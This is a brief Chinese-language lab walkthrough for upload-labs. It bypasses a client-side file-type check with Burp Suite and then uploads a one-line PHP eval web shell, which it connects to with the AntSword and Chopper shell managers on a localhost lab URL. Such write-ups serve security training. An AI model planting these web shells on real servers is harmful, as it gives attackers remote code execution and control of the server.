从代码可以看到是一个直接检查文件类型即可上传
而且并没有请求包的发送
说明只是一个前端的检测
渗透步骤一 通过bp抓包修改数据 上传我们需要的文件
我们可以直接修改前端代码 上传我们的指定文件并且进行渗透
<?php
phpinfo();
?>
上面代码保存为1.png
关闭抓包
右键点击上传的图片就会弹出
渗透步骤二
1.中国蚁剑
上传一句话木马文件 获取服务器的文件管理
<?php eval($_POST[q]);?>
http://127.0.0.1/upload-labs-master/upload/2.php
2.中国菜刀
<?php
eval($_POST[q]);
?>
这里版本问题报了个异常
